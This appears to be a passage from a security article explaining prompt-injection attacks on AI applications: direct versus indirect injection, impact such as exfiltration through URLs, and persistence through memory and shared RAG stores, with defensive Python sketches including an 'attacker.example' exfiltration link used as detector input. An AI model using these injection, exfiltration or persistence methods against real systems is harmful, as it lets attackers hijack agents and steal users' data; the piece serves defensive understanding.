In the poison stage, the attacker’s goal is to place malicious inputs into locations where they will ultimately be processed by the AI model. Two primary techniques dominate:
Direct prompt injection: The attacker is the user and provides inputs via normal user interactions. Impact is typically scoped to the attacker’s session but is useful for probing behaviors.
Indirect prompt injection: The attacker poisons data that the application ingests on behalf of other users (e.g., RAG databases, shared documents). This is where impact scales.
Text-based prompt injection is the most common technique
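The difference between the two techniques can be sketched in a few lines of Python. This is a minimal illustration, not any particular framework's API: `Document`, `build_prompt`, `reaches_model`, and the placeholder `PAYLOAD` are all hypothetical names, and the prompt builder deliberately uses naive concatenation to show why retrieved text ends up in the same channel as instructions.

```python
from dataclasses import dataclass


@dataclass
class Document:
    author: str  # who wrote the document (hypothetical field)
    text: str    # content that retrieval may hand to the model


# Placeholder standing in for attacker-controlled text.
PAYLOAD = "[attacker-written instructions would appear here]"


def build_prompt(system: str, question: str, retrieved: list[Document]) -> str:
    """Naively concatenate retrieved text into the prompt.

    Nothing marks the retrieved text as untrusted, so the model sees it
    in the same channel as the system and user text.
    """
    context = "\n".join(doc.text for doc in retrieved)
    return f"{system}\n\nContext:\n{context}\n\nQuestion: {question}"


def reaches_model(prompt: str) -> bool:
    """Return True if the placeholder payload is part of the final prompt."""
    return PAYLOAD in prompt


SYSTEM = "You are a helpful assistant."
clean_doc = Document("hr-team", "Vacation requests go through the HR portal.")
poisoned_doc = Document("attacker", f"Holiday policy overview. {PAYLOAD}")

# Direct: the attacker is the user, so the payload arrives as the question
# and only the attacker's own session is affected.
direct_prompt = build_prompt(SYSTEM, PAYLOAD, [clean_doc])

# Indirect: a different user asks an ordinary question, but retrieval
# returns a document the attacker planted in a shared store.
indirect_prompt = build_prompt(
    SYSTEM, "What is the holiday policy?", [clean_doc, poisoned_doc]
)

print(reaches_model(direct_prompt), reaches_model(indirect_prompt))
```

In the indirect case the victim's question contains nothing unusual; the payload reaches the model only because the application retrieved the poisoned document on the victim's behalf.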
What kinds of impacts do attackers achieve through compromised AI systems?
Impact is the stage where the attacker’s objectives materialize: hijacked model outputs trigger actions that affect systems, data, or users beyond the model itself. In AI-powered applications, impact happens when outputs are connected to tools, APIs, or workflows that execute actions in the real world:
State-changing actions: Modifying files, databases, or system configurations.
Financial transactions: Approving payments, initiating transfers, or altering financial records.
Data exfiltration: Encoding sensitive data into outputs that leave the system (e.g., via URLs, CSS tricks, or API ca
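To make the URL-based exfiltration path concrete, the following sketch scans model output for links that carry query data to hosts outside an allowlist. It is an illustration under stated assumptions rather than a complete control: `ALLOWED_HOSTS`, `suspicious_urls`, and the example hostnames are hypothetical, and the regular expression is a simple heuristic that will miss obfuscated links.

```python
import re
from urllib.parse import urlparse, parse_qs

# Hypothetical allowlist of hosts the application is expected to link to.
ALLOWED_HOSTS = {"docs.example.com"}

# Simple heuristic for finding http(s) URLs in text or markdown.
URL_PATTERN = re.compile(r"https?://[^\s)\"'<>]+")


def suspicious_urls(model_output: str) -> list[str]:
    """Return URLs that point to a non-allowlisted host and carry query data.

    A rendered image or link with such a URL would send the query string
    to that host as soon as the client fetches it.
    """
    flagged = []
    for url in URL_PATTERN.findall(model_output):
        parsed = urlparse(url)
        has_query_data = bool(parse_qs(parsed.query))
        if parsed.hostname not in ALLOWED_HOSTS and has_query_data:
            flagged.append(url)
    return flagged


output = (
    "Here is your summary. "
    "![status](https://attacker.example/p.png?d=c2VjcmV0) "
    "See also https://docs.example.com/guide?page=2"
)
print(suspicious_urls(output))
```

Only the first URL is flagged here: the second one also has a query string, but its host is on the allowlist.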
How do attackers persist their influence across sessions and systems?
Persistence allows attackers to turn a single hijack into ongoing control. By embedding malicious payloads into persistent storage, attackers ensure their influence survives within and across user sessions. Persistence paths depend on the application’s design:
Session history persistence: In many apps, injected prompts remain active within the live session.
Cross-session memory: In systems with user-specific memories, attackers can embed payloads that survive across sessions.
Shared resource poisoning: Attackers target shared databases (e.g., RAG sources, knowledge bases) to impact multiple
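The three persistence paths differ mainly in how far a stored entry travels. The sketch below models that with a toy in-memory store; `ContextStore`, its scope names, and the user and session identifiers are hypothetical and do not correspond to any specific product's memory design.

```python
from collections import defaultdict


class ContextStore:
    """Toy model of the places an application may persist text it later replays."""

    def __init__(self) -> None:
        self.session_history = defaultdict(list)  # keyed by (user, session)
        self.user_memory = defaultdict(list)      # keyed by user
        self.shared_kb = []                       # visible to every user

    def write(self, scope: str, text: str, user=None, session=None) -> None:
        if scope == "session":
            self.session_history[(user, session)].append(text)
        elif scope == "memory":
            self.user_memory[user].append(text)
        elif scope == "shared":
            self.shared_kb.append(text)
        else:
            raise ValueError(f"unknown scope: {scope}")

    def context_for(self, user: str, session: str) -> list[str]:
        """Everything that would be replayed to the model for this request."""
        return (
            list(self.session_history.get((user, session), []))
            + list(self.user_memory.get(user, []))
            + list(self.shared_kb)
        )


store = ContextStore()
store.write("session", "entry-in-session", user="alice", session="s1")
store.write("memory", "entry-in-memory", user="alice")
store.write("shared", "entry-in-shared-kb")

print(store.context_for("alice", "s1"))  # same session
print(store.context_for("alice", "s2"))  # same user, later session
print(store.context_for("bob", "s1"))    # different user
```

An entry written to session history is replayed only within that session, an entry in user memory follows the same user into later sessions, and an entry in the shared store is replayed to every user.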